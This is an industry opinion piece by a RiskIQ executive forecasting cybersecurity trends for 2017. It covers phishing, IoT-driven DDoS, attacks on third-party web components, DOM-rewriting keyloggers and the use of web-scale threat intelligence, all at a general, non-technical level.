2016 was a busy year for cyber, with attacks ranging from Yahoo! to the US Democratic National Committee and the rise of ransomware, as well as The Shadow Brokers’ theft and auctioning of hacking tools. Closer to home we saw the largest fine ever imposed by the Information Commissioner (TalkTalk) and growing concern about what fines might look like once GDPR comes into effect in early 2018.
I expect to see some differences in the 2017 threat landscape. The increased use of and reliance on web, mobile apps and social media to engage with customers and prospects along with the continued proliferation of IoT devices offer ever more opportunities for threat actors. Here are some of the trends RiskIQ thinks security professionals should watch out for.
As zero-days and host exploits get harder to pull off, threat actors are reverting to forms of attack that are unsophisticated, but that have proven to be highly effective. Phishing is rising in popularity again and traditional email and web phishing, spear phishing, and whaling (Business Email Compromise or BEC) share many of the same simple root causes: domain infringement and content, branding, and keyword impersonation.
Phishers are also starting to conquer new ground. We’ve seen threat actors leverage fake mobile apps for some time. More recently we’ve seen phishers leverage social media, and in 2017 this trend will grow exponentially—especially with social networks adding online marketplaces (Facebook) and payment gateways.
Internet of Things (IoT)
To date we have seen threat actors exploiting IoT in DDoS attacks, like the one we saw targeting Dyn late in 2016. This attack crippled internet traffic across over half the continental U.S. and numerous other parts of the world. Many will predict that in 2017, IoT will be leveraged in more sophisticated attacks such as ransomware and data leaks, but for the most part, we'll continue to see the same kind of attacks we saw in 2016.
Why? It’s true that IoT will continue to standardise operating systems around Android and Linux variants, eventually making it easier to write broad-scale attack/exploit code. But for now, IoT operating systems and embedded systems are still too fragmented.
As endpoints get harder to compromise, adversaries such as nation-states, hacktivists, and cyber criminals will ramp up the number of external threats hurled against organisations. Therefore, most of the incidents that will lead to data breaches will come from external sources, especially in digital channels like social, mobile, email, and the cloud, where many digital assets are unknown (and thus unmanaged) by the organisations that are responsible for them.
Third Party Components
Threat actors are discovering that if you can’t beat ‘em, target a third-party component that’s part of their infrastructure. Now that Microsoft Windows and Office aren’t the easiest common denominator to exploit, threat actors will move towards other shared components and infrastructure that give them a “many-to-one” advantage, i.e., pieces that plug into many different organisations at the same time.
For example, Content Management Systems (CMSs) like Wordpress are a big target. If a threat actor accesses one, they also access thousands of websites. Additionally, if a marketing partner like Eloqua and Marketo are compromised, a threat actor gains access to data from thousands of customer campaigns as well as thousands of corporate websites that use plugins from these services. Widgets, beacons and commonly used third party libraries will continue to be a target. Compromising these also has the potential to compromise all websites that make use of them.
More Stealthy Tactics
Because modern vulnerability scanners don’t detect embedded attacks in progress, threat actors will get even sneakier. To avoid detection, they will launch attacks that rewrite the document object model (DOM) of page and make use of keyloggers that can record every keystroke made to log a file. That means when you're punching your credit card info into a compromised eCommerce site, it falls right into the hacker's hands.
RiskIQ’s Threat Research Team has seen a new shopping cart exploitation that uses this very method.
Attacks Will Happen Over Shorter Periods
We are increasingly seeing phishing and malware campaigns where the set-up, execution and shut down happens within a day. The speed at which these attacks appear and vanish make them unsolvable by human analysts. That means companies need automation that can quickly and accurately detect these attacks, and push them into global blocking solutions in minutes.
Web Scale Intelligence Will Help Level the Playing Field
Threat actors are getting more sophisticated at hiding their tracks—they anonymise their infrastructure and are improving at detecting and hiding from security scanners and crawlers that identify attacks via websites and ads. To find them, Hunt teams will need to make use of increasingly sophisticated intelligence in the form of new combined internet datasets—such as linking together related hosts, third-party web components, and WHOIS information—that fingerprint and track these new threat actor tactics. Combining the intelligence of what is going on outside the firewall with indicators coming from within the corporate networks will give security teams the situational awareness they need to effectively respond to the evolving threats targeting their organisation.
Ben Harknett VP EMEA, RiskIQ
Image Credit: Shutterstock / BeeBright